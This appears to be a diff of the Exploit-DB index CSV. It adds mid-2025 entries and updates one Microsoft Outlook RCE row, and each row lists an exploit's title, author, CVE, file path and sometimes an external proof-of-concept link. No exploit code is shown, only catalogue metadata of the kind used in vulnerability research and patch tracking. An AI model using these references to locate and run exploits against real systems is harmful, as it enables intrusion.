35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,,
52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,,
52361,exploits/multiple/webapps/52361.txt,"PivotX 3.0.0 RC3 - Remote Code Execution (RCE)",2025-07-16,HayToN,webapps,multiple,,2025-07-16,2025-07-16,0,CVE-2025-52367,,,,,
49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,,2021-02-03,2021-02-03,0,CVE-2020-23522,,,,,
52211,exploits/multiple/webapps/52211.txt,"Plane 0.23.1 - Server side request forgery (SSRF)",2025-04-15,"Saud Alenazi",webapps,multiple,,2025-04-15,2025-04-15,0,,,,,,
50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",2021-10-18,"Basavaraj Banakar",webapps,multiple,,2021-10-18,2021-10-18,0,CVE-2021-41382,,,,,
@ -12443,6 +12447,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49832,exploits/multiple/webapps/49832.js,"StudyMD 0.3.2 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
14101,exploits/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,webapps,multiple,80,2010-06-28,2010-06-28,1,,,,,,
35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,,
52365,exploits/multiple/webapps/52365.txt,"SugarCRM 14.0.0 - SSRF/Code Injection",2025-07-16,"Egidio Romano",webapps,multiple,,2025-07-16,2025-07-16,0,CVE-2024-58258,,,,,https://karmainsecurity.com/pocs/CVE-2024-58258.sh
51340,exploits/multiple/webapps/51340.txt,"Suprema BioStar 2 v2.8.16 - SQL Injection",2023-04-08,"Yuriy (Vander) Tsarenko",webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-27167,,,,,
51804,exploits/multiple/webapps/51804.txt,"SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration",2024-02-19,"Jonas Benjamin Friedli",webapps,multiple,,2024-02-19,2024-02-19,0,CVE-2023-3897,,,,,
52286,exploits/multiple/webapps/52286.txt,"SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation",2025-05-09,"Abdualhadi khalifa",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-27007,,,,,https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/
@ -12527,6 +12532,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple,,2020-04-06,2020-04-06,0,CVE-2019-18426,,,,,
51781,exploits/multiple/webapps/51781.txt,"WhatsUp Gold 2022 (22.1.0 Build 39) - XSS",2024-02-05,"Andreas Finstad",webapps,multiple,,2024-02-05,2024-02-05,0,,,,,,
50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",2021-10-01,"Andreas Finstad",webapps,multiple,,2021-10-01,2021-10-01,0,CVE-2021-41318,,,,,
52367,exploits/multiple/webapps/52367.txt,"White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)",2025-07-16,"Imraan Khan (Lich-Sec)",webapps,multiple,,2025-07-16,2025-07-16,0,CVE-2025-44177,,,,,
10821,exploits/multiple/webapps/10821.txt,"Wing FTP Server 3.2.4 - Cross-Site Request Forgery",2009-12-30,Ams,webapps,multiple,,2009-12-29,,0,,,,,,
48154,exploits/multiple/webapps/48154.sh,"Wing FTP Server 6.2.5 - Privilege Escalation",2020-03-02,"Cary Hooper",webapps,multiple,,2020-03-02,2020-03-02,0,,,,,,
43441,exploits/multiple/webapps/43441.txt,"WinMX < 2.6 - Design Error",2003-06-02,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00006,,,,,http://gulftech.org/advisories/WinMX%20Design%20Error/6
@ -12549,6 +12555,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
40133,exploits/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-12-03,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php
52368,exploits/multiple/webapps/52368.txt,"WP Publications WordPress Plugin 1.2 - Stored XSS",2025-07-16,"Zeynalxan Quliyev",webapps,multiple,,2025-07-16,2025-07-16,0,CVE-2024-11605,,,,,
50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",2021-09-02,Sentinal920,webapps,multiple,,2021-09-02,2021-09-02,0,,,,,http://www.exploit-db.comwpanel4-cms-4.3.1.zip,
9730,exploits/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQL Injection / Persistent Cross-Site Scripting",2009-09-21,learn3r,webapps,multiple,,2009-09-20,,1,OSVDB-58262;CVE-2009-3328;OSVDB-58261;OSVDB-58260;CVE-2009-3327,,,,,
50113,exploits/multiple/webapps/50113.txt,"Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE)",2021-07-08,"Patrik Lantz",webapps,multiple,,2021-07-08,2021-07-08,0,,,,,,
@ -12605,6 +12612,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23587,exploits/netware/remote/23587.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - snoop.jsp Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",remote,netware,,2004-01-23,2012-12-23,1,CVE-2004-2104;OSVDB-3720,,,,,https://www.securityfocus.com/bid/9479/info
23588,exploits/netware/remote/23588.txt,"Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet - Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",remote,netware,,2004-01-23,2012-12-23,1,CVE-2004-2104;OSVDB-3721,,,,,https://www.securityfocus.com/bid/9479/info
52276,exploits/nodejs/local/52276.py,"unzip-stream 0.3.1 - Arbitrary File Write",2025-04-30,cybersploit,local,nodejs,,2025-04-30,2025-04-30,0,CVE-2024-42471,,,,,https://themcsam.github.io/posts/unzip-stream-PoC/
52369,exploits/nodejs/remote/52369.py,"NodeJS 24.x - Path Traversal",2025-07-16,"Abdualhadi khalifa",remote,nodejs,,2025-07-16,2025-07-16,0,CVE-2025-27210,,,,,
43054,exploits/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",webapps,nodejs,,2017-10-25,2017-10-25,0,CVE-2017-15878,,,,,
43053,exploits/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",webapps,nodejs,,2017-10-25,2017-10-25,0,CVE-2017-15879,,,,,
43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs,,2018-01-28,2018-01-28,0,CVE-2017-16570,,,,,
@ -35198,6 +35206,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",2022-01-05,"Jeremiasz Pluta",remote,python,,2022-01-05,2022-01-05,0,CVE-2021-43857,,,,,
42599,exploits/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,remote,python,,2017-08-31,2017-09-01,1,CVE-2017-1000117,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/202c936868328a4fe665c9d2ea82b8f8a2610b6e/modules/exploits/multi/http/git_submodule_command_exec.rb
52227,exploits/python/remote/52227.txt,"Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)",2025-04-16,"The Kernel Panic",remote,python,,2025-04-16,2025-04-16,0,CVE-2024-11392,,,,,https://drive.google.com/file/d/14bnNaCRmFOQvPHUR9zQwdbjMmzKE2pZl/view?usp=drive_link
52359,exploits/python/remote/52359.py,"Keras 2.15 - Remote Code Execution (RCE)",2025-07-16,"Mohammed Idrees Banyamer",remote,python,,2025-07-16,2025-07-16,0,CVE-2025-1550,,,,,
41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,,2017-03-24,2017-04-04,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/a93aef8b7adecc4059c6cf168dd181e169cbc0b2/modules/exploits/linux/http/logsign_exec.rb
46075,exploits/python/remote/46075.rb,"Mailcleaner - (Authenticated) Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443,2019-01-07,2019-03-17,0,,"Metasploit Framework (MSF)",,,,
41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@ -41052,6 +41061,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14745,exploits/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-12-04-at-205544.png,,
45354,exploits/windows/local/45354.txt,"Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection",2018-09-10,hyp3rlinx,local,windows,,2018-09-10,2018-09-10,0,,,,,,
52360,exploits/windows/local/52360.txt,"Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege",2025-07-16,nu11secur1ty,local,windows,,2025-07-16,2025-07-16,0,CVE-2025-49677,,,,,
19789,exploits/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Local Buffer Overflow",2000-03-06,dildog,local,windows,,2000-03-06,2012-07-16,1,CVE-2000-0200;OSVDB-1244,,,,,https://www.securityfocus.com/bid/1034/info
44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,,2018-06-18,2018-06-18,0,CVE-2018-0824,Local,UnmarshalPwn,,,https://codewhitesec.blogspot.com/2018/06/cve-2018-0624.html
19425,exploits/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",local,windows,,1999-07-19,2012-06-27,1,CVE-1999-1011;OSVDB-272,,,,,https://www.securityfocus.com/bid/529/info
@ -41083,6 +41093,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43017,exploits/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,local,windows,,2017-10-19,2017-10-19,0,,,,,,
50776,exploits/windows/local/50776.txt,"Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path",2022-02-21,"Johto Robbie",local,windows,,2022-02-21,2022-02-21,0,,,,,,
49214,exploits/windows/local/49214.txt,"Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path",2020-12-08,"Ismael Nava",local,windows,,2020-12-08,2021-02-18,0,,,,,,
52362,exploits/windows/local/52362.txt,"Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges",2025-07-16,nu11secur1ty,local,windows,,2025-07-16,2025-07-16,0,CVE-2025-49744,,,,,
14758,exploits/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3139;OSVDB-67535,,,,,
3149,exploits/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow",2007-01-17,porkythepig,local,windows,,2007-01-16,,1,OSVDB-31899;CVE-2007-0427;OSVDB-31898;CVE-2007-0352,,,,,
3159,exploits/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow",2007-01-19,porkythepig,local,windows,,2007-01-18,2016-09-20,1,CVE-2007-0427,,,,,
@ -44538,7 +44549,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32339,exploits/windows/remote/32339.txt,"Microsoft Organization Chart 2 - Remote Code Execution",2008-09-08,"Ivan Sanchez",remote,windows,,2008-09-08,2014-03-19,1,CVE-2008-3956;OSVDB-48000,,,,,https://www.securityfocus.com/bid/31059/info
16700,exploits/windows/remote/16700.rb,"Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2010-0266;OSVDB-66296;MS10-045,"Metasploit Framework (MSF)",,,,http://www.akitasecurity.nl/advisory.php?id=AK20091001
16699,exploits/windows/remote/16699.rb,"Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2010-0266;OSVDB-66296;MS10-045,"Metasploit Framework (MSF)",,,,http://www.akitasecurity.nl/advisory.php?id=AK20091001
52356,exploits/windows/remote/52356.txt,"Microsoft Outlook - Remote Code Execution (RCE)",2025-07-08,nu11secur1ty,remote,windows,,2025-07-08,2025-07-08,0,,,,,,
52356,exploits/windows/remote/52356.txt,"Microsoft Outlook - Remote Code Execution (RCE)",2025-07-08,nu11secur1ty,remote,windows,,2025-07-08,2025-07-16,0,CVE-2025-47171,,,,,
20571,exploits/windows/remote/20571.txt,"Microsoft Outlook 2000 0/98 0/Express 5.5 - Concealed Attachment",2001-01-17,http-equiv,remote,windows,,2001-01-17,2012-08-27,1,OSVDB-85833,,,,,https://www.securityfocus.com/bid/2260/info
23796,exploits/windows/remote/23796.html,"Microsoft Outlook 2002 - 'Mailto' Quoting Zone Bypass",2004-03-09,shaun2k2,remote,windows,,2004-03-09,2013-01-01,1,CVE-2004-0121;OSVDB-4168,,,,,https://www.securityfocus.com/bid/9827/info
24114,exploits/windows/remote/24114.html,"Microsoft Outlook 2003 - Mail Client E-mail Address Verification",2004-05-11,http-equiv,remote,windows,,2004-05-11,2013-01-15,1,CVE-2004-0501;OSVDB-6079,,,,,https://www.securityfocus.com/bid/10323/info

Can't render this file because it is too large.